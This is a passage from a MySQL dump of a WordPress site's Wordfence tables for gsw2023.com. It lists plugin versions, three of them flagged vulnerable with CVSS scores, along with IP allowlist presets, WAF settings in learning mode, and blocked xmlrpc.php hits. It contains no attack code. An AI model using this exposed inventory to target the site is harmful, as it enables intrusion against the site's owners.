ink\";b:0;}i:22;a:4:{s:4:\"slug\";s:20:\"recent-tweets-widget\";s:11:\"fromVersion\";s:5:\"1.6.8\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:23;a:4:{s:4:\"slug\";s:12:\"use-any-font\";s:11:\"fromVersion\";s:6:\"6.3.01\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:24;a:4:{s:4:\"slug\";s:9:\"wordfence\";s:11:\"fromVersion\";s:6:\"7.10.3\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:25;a:4:{s:4:\"slug\";s:12:\"wpforms-lite\";s:11:\"fromVersion\";s:7:\"1.8.3.1\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:26;a:4:{s:4:\"slug\";s:15:\"wp-google-fonts\";s:11:\"fromVersion\";s:5:\"3.1.5\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:27;a:4:{s:4:\"slug\";s:14:\"duplicate-post\";s:11:\"fromVersion\";s:3:\"4.5\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:28;a:4:{s:4:\"slug\";s:11:\"convertplug\";s:11:\"fromVersion\";s:6:\"3.5.24\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:29;a:6:{s:4:\"slug\";s:10:\"go_pricing\";s:11:\"fromVersion\";s:6:\"3.3.19\";s:10:\"vulnerable\";b:1;s:4:\"link\";s:108:\"https://www.wordfence.com/threat-intel/vulnerabilities/id/f7686b11-97a8-4f09-bbfa-d77120cc35b7?source=plugin\";s:5:\"score\";s:4:\"8.80\";s:6:\"vector\";s:44:\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\";}i:30;a:6:{s:4:\"slug\";s:9:\"revslider\";s:11:\"fromVersion\";s:6:\"6.5.19\";s:10:\"vulnerable\";b:1;s:4:\"link\";s:108:\"https://www.wordfence.com/threat-intel/vulnerabilities/id/4fa00dae-c51d-4586-81da-b568cd6d8124?source=plugin\";s:5:\"score\";s:4:\"7.20\";s:6:\"vector\";s:44:\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\";}i:31;a:4:{s:4:\"slug\";s:8:\"the7-cli\";s:11:\"fromVersion\";s:5:\"1.0.0\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:32;a:4:{s:4:\"slug\";s:12:\"dt-the7-core\";s:11:\"fromVersion\";s:5:\"2.6.1\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:33;a:4:{s:4:\"slug\";s:18:\"Ultimate_VC_Addons\";s:11:\"fromVersion\";s:7:\"3.19.11\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:34;a:6:{s:4:\"slug\";s:11:\"js_composer\";s:11:\"fromVersion\";s:6:\"6.10.0\";s:10:\"vulnerable\";b:1;s:4:\"link\";s:108:\"https://www.wordfence.com/threat-intel/vulnerabilities/id/78579ed9-1540-44be-9884-51fc2afec2bd?source=plugin\";s:5:\"score\";s:4:\"6.40\";s:6:\"vector\";s:44:\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\";}}','yes'),
('vulnerabilities_theme','a:2:{i:0;a:5:{s:4:\"slug\";s:13:\"consultstreet\";s:9:\"toVersion\";s:5:\"2.5.0\";s:11:\"fromVersion\";s:5:\"2.3.9\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:1;a:5:{s:4:\"slug\";s:17:\"twentytwentythree\";s:9:\"toVersion\";s:3:\"1.2\";s:11:\"fromVersion\";s:3:\"1.1\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}}','yes'),
('wafAlertInterval','600','yes'),
('wafAlertOnAttacks','1','yes'),
('wafAlertThreshold','100','yes'),
('wafAlertWhitelist','','yes'),
('waf_status','learning-mode','yes'),
('wfKillRequested','0','no'),
('wfPeakMemory','18874368','no'),
('wfScanStartVersion','6.3','yes'),
('wfStatusStartMsgs','a:2:{i:0;s:0:\"\";i:1;s:0:\"\";}','yes'),
('wf_scanLastStatusTime','0','yes'),
('wf_scanRunning','','yes'),
('wf_summaryItems','a:8:{s:12:\"scannedPosts\";i:0;s:15:\"scannedComments\";i:0;s:12:\"scannedFiles\";i:0;s:14:\"scannedPlugins\";i:0;s:13:\"scannedThemes\";i:0;s:12:\"scannedUsers\";i:0;s:11:\"scannedURLs\";i:0;s:10:\"lastUpdate\";i:1691937506;}','yes'),
('whitelisted','','yes'),
('whitelistedServices','{}','yes'),
('whitelistHash','bf3d76dc05caf8623cb3fe01c1fc9e308e2f2ea37b826937d850fde361cdefd4','yes'),
('whitelistPresets','{\"wordfence\":{\"n\":\"Wordfence\",\"h\":true,\"d\":true,\"f\":true,\"r\":[\"54.68.32.247\",\"69.46.36.0\\/27\",\"2605:2400:0104:0100::\\/56\"]},\"sucuri\":{\"n\":\"Sucuri\",\"d\":true,\"r\":[\"97.74.127.171\",\"69.164.203.172\",\"173.230.128.135\",\"66.228.34.49\",\"66.228.40.185\",\"50.116.36.92\",\"50.116.36.93\",\"50.116.3.171\",\"198.58.96.212\",\"50.116.63.221\",\"192.155.92.112\",\"192.81.128.31\",\"198.58.106.244\",\"192.155.95.139\",\"23.239.9.227\",\"198.58.112.103\",\"192.155.94.43\",\"162.216.16.33\",\"173.255.233.124\",\"173.255.233.124\",\"192.155.90.179\",\"50.116.41.217\",\"192.81.129.227\",\"198.58.111.80\",\"162.216.19.183\"]},\"facebook\":{\"n\":\"Facebook\",\"d\":true,\"r\":[\"69.63.176.0\\/20\",\"66.220.144.0\\/20\",\"66.220.144.0\\/21\",\"69.63.184.0\\/21\",\"69.63.176.0\\/21\",\"74.119.76.0\\/22\",\"69.171.255.0\\/24\",\"173.252.64.0\\/18\",\"69.171.224.0\\/19\",\"69.171.224.0\\/20\",\"103.4.96.0\\/22\",\"69.63.176.0\\/24\",\"173.252.64.0\\/19\",\"173.252.70.0\\/24\",\"31.13.64.0\\/18\",\"31.13.24.0\\/21\",\"66.220.152.0\\/21\",\"66.220.159.0\\/24\",\"69.171.239.0\\/24\",\"69.171.240.0\\/20\",\"31.13.64.0\\/19\",\"31.13.64.0\\/24\",\"31.13.65.0\\/24\",\"31.13.67.0\\/24\",\"31.13.68.0\\/24\",\"31.13.69.0\\/24\",\"31.13.70.0\\/24\",\"31.13.71.0\\/24\",\"31.13.72.0\\/24\",\"31.13.73.0\\/24\",\"31.13.74.0\\/24\",\"31.13.75.0\\/24\",\"31.13.76.0\\/24\",\"31.13.77.0\\/24\",\"31.13.96.0\\/19\",\"31.13.66.0\\/24\",\"173.252.96.0\\/19\",\"69.63.178.0\\/24\",\"31.13.78.0\\/24\",\"31.13.79.0\\/24\",\"31.13.80.0\\/24\",\"31.13.82.0\\/24\",\"31.13.83.0\\/24\",\"31.13.84.0\\/24\",\"31.13.85.0\\/24\",\"31.13.86.0\\/24\",\"31.13.87.0\\/24\",\"31.13.88.0\\/24\",\"31.13.89.0\\/24\",\"31.13.90.0\\/24\",\"31.13.91.0\\/24\",\"31.13.92.0\\/24\",\"31.13.93.0\\/24\",\"31.13.94.0\\/24\",\"31.13.95.0\\/24\",\"69.171.253.0\\/24\",\"69.63.186.0\\/24\",\"31.13.81.0\\/24\",\"179.60.192.0\\/22\",\"179.60.192.0\\/24\",\"179.60.193.0\\/24\",\"179.60.194.0\\/24\",\"179.60.195.0\\/24\",\"185.60.216.0\\/22\",\"45.64.40.0\\/22\",\"185.60.216.0\\/24\",\"185.60.217.0\\/24\",\"185.60.218.0\\/24\",\"185.60.219.0\\/24\",\"129.134.0.0\\/16\",\"157.240.0.0\\/16\",\"157.240.8.0\\/24\",\"157.240.0.0\\/24\",\"157.240.1.0\\/24\",\"157.240.2.0\\/24\",\"157.240.3.0\\/24\",\"157.240.4.0\\/24\",\"157.240.5.0\\/24\",\"157.240.6.0\\/24\",\"157.240.7.0\\/24\",\"157.240.9.0\\/24\",\"157.240.10.0\\/24\",\"157.240.16.0\\/24\",\"157.240.19.0\\/24\",\"157.240.11.0\\/24\",\"157.240.12.0\\/24\",\"157.240.13.0\\/24\",\"157.240.14.0\\/24\",\"157.240.15.0\\/24\",\"157.240.17.0\\/24\",\"157.240.18.0\\/24\",\"157.240.20.0\\/24\",\"157.240.21.0\\/24\",\"157.240.22.0\\/24\",\"157.240.23.0\\/24\",\"157.240.0.0\\/17\",\"69.171.250.0\\/24\",\"157.240.24.0\\/24\",\"157.240.25.0\\/24\",\"199.201.64.0\\/24\",\"199.201.65.0\\/24\",\"199.201.64.0\\/22\",\"204.15.20.0\\/22\",\"157.240.192.0\\/24\",\"129.134.0.0\\/17\",\"204.15.20.0\\/22\",\"69.63.176.0\\/20\",\"69.63.176.0\\/21\",\"69.63.184.0\\/21\",\"66.220.144.0\\/20\",\"69.63.176.0\\/20\",\"2620:0:1c00::\\/40\",\"2a03:2880::\\/32\",\"2a03:2880:fffe::\\/48\",\"2a03:2880:ffff::\\/48\",\"2620:0:1cff::\\/48\",\"2a03:2880:f000::\\/48\",\"2a03:2880:f001::\\/48\",\"2a03:2880:f002::\\/48\",\"2a03:2880:f003::\\/48\",\"2a03:2880:f004::\\/48\",\"2a03:2880:f005::\\/48\",\"2a03:2880:f006::\\/48\",\"2a03:2880:f007::\\/48\",\"2a03:2880:f008::\\/48\",\"2a03:2880:f009::\\/48\",\"2a03:2880:f00a::\\/48\",\"2a03:2880:f00b::\\/48\",\"2a03:2880:f00c::\\/48\",\"2a03:2880:f00d::\\/48\",\"2a03:2880:f00e::\\/48\",\"2a03:2880:f00f::\\/48\",\"2a03:2880:f010::\\/48\",\"2a03:2880:f011::\\/48\",\"2a03:2880:f012::\\/48\",\"2a03:2880:f013::\\/48\",\"2a03:2880:f014::\\/48\",\"2a03:2880:f015::\\/48\",\"2a03:2880:f016::\\/48\",\"2a03:2880:f017::\\/48\",\"2a03:2880:f018::\\/48\",\"2a03:2880:f019::\\/48\",\"2a03:2880:f01a::\\/48\",\"2a03:2880:f01b::\\/48\",\"2a03:2880:f01c::\\/48\",\"2a03:2880:f01d::\\/48\",\"2a03:2880:f01e::\\/48\",\"2a03:2880:f01f::\\/48\",\"2a03:2880:1000::\\/36\",\"2a03:2880:2000::\\/36\",\"2a03:2880:3000::\\/36\",\"2a03:2880:4000::\\/36\",\"2a03:2880:5000::\\/36\",\"2a03:2880:6000::\\/36\",\"2a03:2880:7000::\\/36\",\"2a03:2880:f020::\\/48\",\"2a03:2880:f021::\\/48\",\"2a03:2880:f022::\\/48\",\"2a03:2880:f023::\\/48\",\"2a03:2880:f024::\\/48\",\"2a03:2880:f025::\\/48\",\"2a03:2880:f026::\\/48\",\"2a03:2880:f027::\\/48\",\"2a03:2880:f028::\\/48\",\"2a03:2880:f029::\\/48\",\"2a03:2880:f02b::\\/48\",\"2a03:2880:f02c::\\/48\",\"2a03:2880:f02d::\\/48\",\"2a03:2880:f02e::\\/48\",\"2a03:2880:f02f::\\/48\",\"2a03:2880:f030::\\/48\",\"2a03:2880:f031::\\/48\",\"2a03:2880:f032::\\/48\",\"2a03:2880:f033::\\/48\",\"2a03:2880:f034::\\/48\",\"2a03:2880:f035::\\/48\",\"2a03:2880:f036::\\/48\",\"2a03:2880:f037::\\/48\",\"2a03:2880:f038::\\/48\",\"2a03:2880:f039::\\/48\",\"2a03:2880:f03a::\\/48\",\"2a03:2880:f03b::\\/48\",\"2a03:2880:f03c::\\/48\",\"2a03:2880:f03d::\\/48\",\"2a03:2880:f03e::\\/48\",\"2a03:2880:f03f::\\/48\",\"2401:db00::\\/32\",\"2a03:2880::\\/36\",\"2803:6080::\\/32\",\"2a03:2880:f100::\\/48\",\"2a03:2880:f200::\\/48\",\"2a03:2880:f101::\\/48\",\"2a03:2880:f201::\\/48\",\"2a03:2880:f102::\\/48\",\"2a03:2880:f202::\\/48\",\"2a03:2880:f103::\\/48\",\"2a03:2880:f203::\\/48\",\"2a03:2880:f104::\\/48\",\"2a03:2880:f204::\\/48\",\"2a03:2880:f107::\\/48\",\"2a03:2880:f207::\\/48\",\"2a03:2880:f108::\\/48\",\"2a03:2880:f208::\\/48\",\"2a03:2880:f109::\\/48\",\"2a03:2880:f209::\\/48\",\"2a03:2880:f10a::\\/48\",\"2a03:2880:f20a::\\/48\",\"2a03:2880:f10b::\\/48\",\"2a03:2880:f20b::\\/48\",\"2a03:2880:f10d::\\/48\",\"2a03:2880:f20d::\\/48\",\"2a03:2880:f10e::\\/48\",\"2a03:2880:f20e::\\/48\",\"2a03:2880:f10f::\\/48\",\"2a03:2880:f20f::\\/48\",\"2a03:2880:f110::\\/48\",\"2a03:2880:f210::\\/48\",\"2a03:2880:f111::\\/48\",\"2a03:2880:f211::\\/48\",\"2a03:2880:f112::\\/48\",\"2a03:2880:f212::\\/48\",\"2a03:2880:f114::\\/48\",\"2a03:2880:f214::\\/48\",\"2a03:2880:f115::\\/48\",\"2a03:2880:f215::\\/48\",\"2a03:2880:f116::\\/48\",\"2a03:2880:f216::\\/48\",\"2a03:2880:f117::\\/48\",\"2a03:2880:f217::\\/48\",\"2a03:2880:f118::\\/48\",\"2a03:2880:f218::\\/48\",\"2a03:2880:f119::\\/48\",\"2a03:2880:f219::\\/48\",\"2a03:2880:f11a::\\/48\",\"2a03:2880:f21a::\\/48\",\"2a03:2880:f11f::\\/48\",\"2a03:2880:f21f::\\/48\",\"2a03:2880:f121::\\/48\",\"2a03:2880:f221::\\/48\",\"2a03:2880:f122::\\/48\",\"2a03:2880:f222::\\/48\",\"2a03:2880:f123::\\/48\",\"2a03:2880:f223::\\/48\",\"2a03:2880:f10c::\\/48\",\"2a03:2880:f20c::\\/48\",\"2a03:2880:f126::\\/48\",\"2a03:2880:f226::\\/48\",\"2a03:2880:f105::\\/48\",\"2a03:2880:f205::\\/48\",\"2a03:2880:f125::\\/48\",\"2a03:2880:f225::\\/48\",\"2a03:2880:f106::\\/48\",\"2a03:2880:f206::\\/48\",\"2a03:2880:f11b::\\/48\",\"2a03:2880:f21b::\\/48\",\"2a03:2880:f113::\\/48\",\"2a03:2880:f213::\\/48\",\"2a03:2880:f11c::\\/48\",\"2a03:2880:f21c::\\/48\",\"2a03:2880:f128::\\/48\",\"2a03:2880:f228::\\/48\",\"2a03:2880:f02a::\\/48\",\"2a03:2880:f12a::\\/48\",\"2a03:2880:f22a::\\/48\",\"2a03:2880:f12f::\\/48\",\"2a03:2880:f22f::\\/48\",\"2a03:2880:f11d::\\/48\",\"2a03:2880:f11e::\\/48\",\"2a03:2880:f120::\\/48\",\"2a03:2880:f124::\\/48\",\"2a03:2880:f127::\\/48\",\"2a03:2880:f129::\\/48\",\"2a03:2880:f12b::\\/48\",\"2a03:2880:f12c::\\/48\",\"2a03:2880:f12d::\\/48\",\"2a03:2880:f12e::\\/48\",\"2a03:2880:f130::\\/48\",\"2a03:2880:f131::\\/48\",\"2a03:2880:f132::\\/48\",\"2a03:2880:f133::\\/48\",\"2a03:2880:f134::\\/48\",\"2a03:2880:f135::\\/48\",\"2a03:2880:f136::\\/48\",\"2a03:2880:f137::\\/48\",\"2a03:2880:f138::\\/48\",\"2a03:2880:f139::\\/48\",\"2a03:2880:f13a::\\/48\",\"2a03:2880:f13b::\\/48\",\"2a03:2880:f13c::\\/48\",\"2a03:2880:f13d::\\/48\",\"2a03:2880:f13e::\\/48\",\"2a03:2880:f13f::\\/48\",\"2a03:2880:f21d::\\/48\",\"2a03:2880:f21e::\\/48\",\"2a03:2880:f220::\\/48\",\"2a03:2880:f224::\\/48\",\"2a03:2880:f227::\\/48\",\"2a03:2880:f229::\\/48\",\"2a03:2880:f22b::\\/48\",\"2a03:2880:f22c::\\/48\",\"2a03:2880:f22d::\\/48\",\"2a03:2880:f22e::\\/48\",\"2a03:2880:f230::\\/48\",\"2a03:2880:f231::\\/48\",\"2a03:2880:f232::\\/48\",\"2a03:2880:f233::\\/48\",\"2a03:2880:f234::\\/48\",\"2a03:2880:f235::\\/48\",\"2a03:2880:f236::\\/48\",\"2a03:2880:f237::\\/48\",\"2a03:2880:f238::\\/48\",\"2a03:2880:f239::\\/48\",\"2a03:2880:f23a::\\/48\",\"2a03:2880:f23b::\\/48\",\"2a03:2880:f23c::\\/48\",\"2a03:2880:f23d::\\/48\",\"2a03:2880:f23e::\\/48\",\"2a03:2880:f23f::\\/48\",\"2a03:2880:f0ff::\\/48\",\"2a03:2880:f1ff::\\/48\",\"2a03:2880:f2ff::\\/48\",\"2c0f:ef78:0003::\\/48\"]},\"uptimerobot\":{\"n\":\"Uptime Robot\",\"d\":true,\"r\":[\"69.162.124.224\\/28\",\"63.143.42.240\\/28\"]},\"statuscake\":{\"n\":\"StatusCake\",\"d\":true,\"r\":[\"103.194.112.70\",\"104.131.247.151\",\"104.131.248.65\",\"104.131.248.78\",\"104.156.229.24\",\"104.156.255.184\",\"104.206.168.26\",\"104.238.164.105\",\"107.150.1.135\",\"107.155.104.182\",\"107.155.108.234\",\"107.155.125.29\",\"107.161.28.219\",\"107.170.197.248\",\"107.170.219.46\",\"107.170.227.23\",\"107.170.227.24\",\"107.170.240.141\",\"107.170.53.191\",\"107.191.47.131\",\"107.191.57.237\",\"108.61.119.153\",\"108.61.162.214\",\"108.61.205.201\",\"108.61.212.141\",\"108.61.215.179\",\"125.63.48.239\",\"128.199.222.65\",\"138.197.130.232\",\"138.197.130.235\",\"138.197.140.243\",\"138.204.171.136\",\"138.68.24.115\",\"138.68.24.136\",\"138.68.24.207\",\"138.68.24.60\",\"138.68.80.10\",\"138.68.80.173\",\"139.59.15.79\",\"139.59.155.26\",\"139.59.190.241\",\"139.59.22.109\",\"139.59.26.85\",\"139.59.29.167\",\"149.154.157.61\",\"149.255.59.100\",\"151.236.10.238\",\"151.236.18.80\",\"151.80.175.223\",\"151.80.175.226\",\"154.127.60.23\",\"154.127.60.59\",\"158.255.208.76\",\"159.203.182.22\",\"159.203.182.60\",\"159.203.186.225\",\"159.203.31.18\",\"162.243.247.163\",\"162.243.71.56\",\"162.248.97.72\",\"162.253.64.104\",\"162.253.64.87\",\"176.56.230.110\",\"178.62.101.57\",\"178.62.104.137\",\"178.62.106.84\",\"178.62.109.7\",\"178.62.40.233\",\"178.62.41.44\",\"178.62.41.49\",\"178.62.41.52\",\"178.62.65.162\",\"178.62.71.227\",\"178.62.78.199\",\"178.62.80.93\",\"178.62.86.69\",\"178.73.210.99\",\"181.41.201.117\",\"181.41.214.137\",\"185.112.157.185\",\"185.12.45.70\",\"185.47.129.168\",\"185.60.135.86\",\"188.166.158.224\",\"188.166.253.148\",\"188.226.139.158\",\"188.226.158.160\",\"188.226.169.228\",\"188.226.171.58\",\"188.226.184.152\",\"188.226.185.106\",\"188.226.186.199\",\"188.226.203.84\",\"188.226.247.184\",\"188.68.238.79\",\"192.241.221.11\",\"193.124.178.54\",\"193.124.178.61\",\"193.182.144.105\",\"193.182.144.147\",\"199.167.128.80\",\"209.222.30.242\",\"213.183.56.107\",\"217.148.43.188\",\"217.148.43.202\",\"31.220.7.237\",\"37.157.246.146\",\"37.235.48.42\",\"37.235.52.25\",\"37.235.53.240\",\"37.235.55.205\",\"37.97.188.103\",\"45.32.128.80\",\"45.32.145.79\",\"45.32.151.21\",\"45.32.160.172\",\"45.32.166.195\",\"45.32.171.24\",\"45.32.192.198\",\"45.32.195.186\",\"45.32.195.93\",\"45.32.212.56\",\"45.32.36.158\",\"45.32.7.22\",\"45.63.121.159\",\"45.63.26.78\",\"45.63.51.63\",\"45.63.61.213\",\"45.63.76.68\",\"45.63.78.84\",\"45.63.86.120\",\"45.63.88.213\",\"45.76.1.44\",\"45.76.192.50\",\"45.76.3.112\",\"46.101.0.24\",\"46.101.110.32\",\"46.101.110.43\",\"46.101.110.45\",\"46.101.20.96\",\"46.101.238.182\",\"46.101.238.189\",\"46.101.240.208\",\"46.101.27.186\",\"46.101.61.83\",\"46.101.74.251\",\"5.45.179.103\",\"50.2.139.16\",\"82.221.95.161\",\"91.236.116.163\"]},\"managewp\":{\"n\":\"ManageWP\",\"d\":false,\"r\":[\"34.211.180.66\",\"54.70.65.107\",\"34.210.224.7\",\"52.41.5.108\",\"52.35.72.129\",\"54.191.137.17\",\"35.162.254.253\",\"52.11.12.231\",\"52.11.29.70\",\"52.11.54.161\",\"52.24.142.159\",\"52.25.191.255\",\"52.27.181.126\",\"52.34.126.117\",\"52.34.254.47\",\"52.35.82.99\",\"52.36.28.80\",\"52.38.106.97\",\"52.39.177.152\",\"52.41.230.148\",\"52.41.237.12\",\"52.42.126.166\",\"52.43.13.71\",\"52.43.76.224\",\"52.88.96.110\",\"52.89.155.51\",\"54.148.73.118\",\"54.186.37.105\",\"54.187.92.57\",\"54.191.32.65\",\"54.191.67.23\",\"54.191.80.119\",\"54.191.135.209\",\"54.191.136.176\",\"54.191.148.85\",\"54.191.149.8\",\"52.26.122.21\",\"52.24.187.29\",\"52.89.85.107\",\"54.186.128.167\",\"54.191.40.136\",\"52.24.62.11\",\"52.88.119.122\",\"54.191.148.225\",\"54.191.151.18\",\"52.89.94.121\",\"52.25.116.116\",\"52.88.215.225\",\"54.186.143.184\",\"52.88.197.180\",\"52.27.171.126\"]},\"seznam\":{\"n\":\"Seznam Search Engine\",\"d\":true,\"r\":[\"77.75.74.0\\/24\",\"77.75.76.0\\/24\",\"77.75.77.0\\/24\",\"77.75.78.0\\/24\",\"77.75.79.0\\/24\",\"2a02:598:a::78:0\\/112\",\"2a02:598:a::79:0\\/112\",\"2a02:598:2::0\\/96\"]}}','yes'),
('wordfenceI18n','1','yes'),
('wordpressPluginVersions','a:34:{s:20:\"advanced-backgrounds\";s:6:\"1.10.0\";s:8:\"androapp\";s:5:\"25.03\";s:14:\"classic-editor\";s:5:\"1.6.3\";s:11:\"coming-soon\";s:9:\"6.15.13.1\";s:14:\"contact-form-7\";s:7:\"5.7.5.1\";s:11:\"convertplug\";s:6:\"3.5.24\";s:17:\"disable-gutenberg\";s:3:\"3.0\";s:17:\"easy-google-fonts\";s:5:\"2.0.4\";s:9:\"elementor\";s:6:\"3.12.0\";s:20:\"olympus-google-fonts\";s:5:\"3.3.7\";s:4:\"give\";s:6:\"2.25.3\";s:30:\"google-analytics-for-wordpress\";s:4:\"8.18\";s:10:\"go_pricing\";s:6:\"3.3.19\";s:18:\"add-search-to-menu\";s:3:\"5.5\";s:8:\"mity-pro\";s:5:\"1.2.6\";s:12:\"optinmonster\";s:6:\"2.13.7\";s:12:\"pdf-embedder\";s:5:\"4.6.4\";s:10:\"seoplugins\";s:5:\"1.6.7\";s:15:\"protect-uploads\";s:3:\"0.4\";s:11:\"rafflepress\";s:6:\"1.11.4\";s:20:\"recent-tweets-widget\";s:5:\"1.6.8\";s:15:\"google-site-kit\";s:6:\"1.96.0\";s:9:\"revslider\";s:6:\"6.5.19\";s:8:\"the7-cli\";s:5:\"1.0.0\";s:12:\"dt-the7-core\";s:5:\"2.6.1\";s:18:\"Ultimate_VC_Addons\";s:7:\"3.19.11\";s:12:\"use-any-font\";s:6:\"6.3.01\";s:15:\"white-label-cms\";s:3:\"2.5\";s:9:\"wordfence\";s:6:\"7.10.3\";s:11:\"js_composer\";s:6:\"6.10.0\";s:15:\"wp-file-manager\";s:5:\"7.1.8\";s:12:\"wpforms-lite\";s:7:\"1.8.3.1\";s:15:\"wp-google-fonts\";s:5:\"3.1.5\";s:14:\"duplicate-post\";s:3:\"4.5\";}','yes'),
('wordpressThemeVersions','a:7:{s:13:\"consultstreet\";s:5:\"2.3.9\";s:7:\"dt-the7\";s:6:\"11.7.3\";s:12:\"twentytwenty\";s:3:\"2.2\";s:15:\"twentytwentyone\";s:3:\"1.8\";s:17:\"twentytwentythree\";s:3:\"1.1\";s:15:\"twentytwentytwo\";s:3:\"1.4\";s:4:\"zinl\";s:5:\"1.0.0\";}','yes'),
('wordpressVersion','6.3','yes'),
('wp_home_url','https://gsw2023.com','yes'),
('wp_site_url','https://gsw2023.com','yes');
/*!40000 ALTER TABLE `dnctiavkr_wfconfig` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_wfcrawlers`
--

DROP TABLE IF EXISTS `dnctiavkr_wfcrawlers`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_wfcrawlers` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `patternSig` binary(16) NOT NULL,
  `status` char(8) NOT NULL,
  `lastUpdate` int(10) unsigned NOT NULL,
  `PTR` varchar(255) DEFAULT '',
  PRIMARY KEY (`IP`,`patternSig`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_wfcrawlers`
--

LOCK TABLES `dnctiavkr_wfcrawlers` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_wfcrawlers` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_wfcrawlers` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_wffilechanges`
--

DROP TABLE IF EXISTS `dnctiavkr_wffilechanges`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_wffilechanges` (
  `filenameHash` char(64) NOT NULL,
  `file` varchar(1000) NOT NULL,
  `md5` char(32) NOT NULL,
  PRIMARY KEY (`filenameHash`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_wffilechanges`
--

LOCK TABLES `dnctiavkr_wffilechanges` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_wffilechanges` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_wffilechanges` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_wffilemods`
--

DROP TABLE IF EXISTS `dnctiavkr_wffilemods`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_wffilemods` (
  `filenameMD5` binary(16) NOT NULL,
  `filename` varchar(1000) NOT NULL,
  `real_path` text NOT NULL,
  `knownFile` tinyint(3) unsigned NOT NULL,
  `oldMD5` binary(16) NOT NULL,
  `newMD5` binary(16) NOT NULL,
  `SHAC` binary(32) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `stoppedOnSignature` varchar(255) NOT NULL DEFAULT '',
  `stoppedOnPosition` int(10) unsigned NOT NULL DEFAULT 0,
  `isSafeFile` varchar(1) NOT NULL DEFAULT '?',
  PRIMARY KEY (`filenameMD5`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_wffilemods`
--

LOCK TABLES `dnctiavkr_wffilemods` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_wffilemods` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_wffilemods` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_wfhits`
--

DROP TABLE IF EXISTS `dnctiavkr_wfhits`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_wfhits` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `attackLogTime` double(17,6) unsigned NOT NULL,
  `ctime` double(17,6) unsigned NOT NULL,
  `IP` binary(16) DEFAULT NULL,
  `jsRun` tinyint(4) DEFAULT 0,
  `statusCode` int(11) NOT NULL DEFAULT 200,
  `isGoogle` tinyint(4) NOT NULL,
  `userID` int(10) unsigned NOT NULL,
  `newVisit` tinyint(3) unsigned NOT NULL,
  `URL` text DEFAULT NULL,
  `referer` text DEFAULT NULL,
  `UA` text DEFAULT NULL,
  `action` varchar(64) NOT NULL DEFAULT '',
  `actionDescription` text DEFAULT NULL,
  `actionData` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `k1` (`ctime`),
  KEY `k2` (`IP`,`ctime`),
  KEY `attackLogTime` (`attackLogTime`)
) ENGINE=InnoDB AUTO_INCREMENT=101 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_wfhits`
--

LOCK TABLES `dnctiavkr_wfhits` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_wfhits` DISABLE KEYS */;
INSERT INTO `dnctiavkr_wfhits` VALUES
(1,0.000000,1691937374.818524,'\0\0\0\0\0\0\0\0\0\0 ',0,503,0,0,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),
(2,0.000000,1691937451.572090,'\0\0\0\0\0\0\0\0\0\0\"',0,503,0,0,0,'https://www.gsw2023.com/xmlrpc.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),
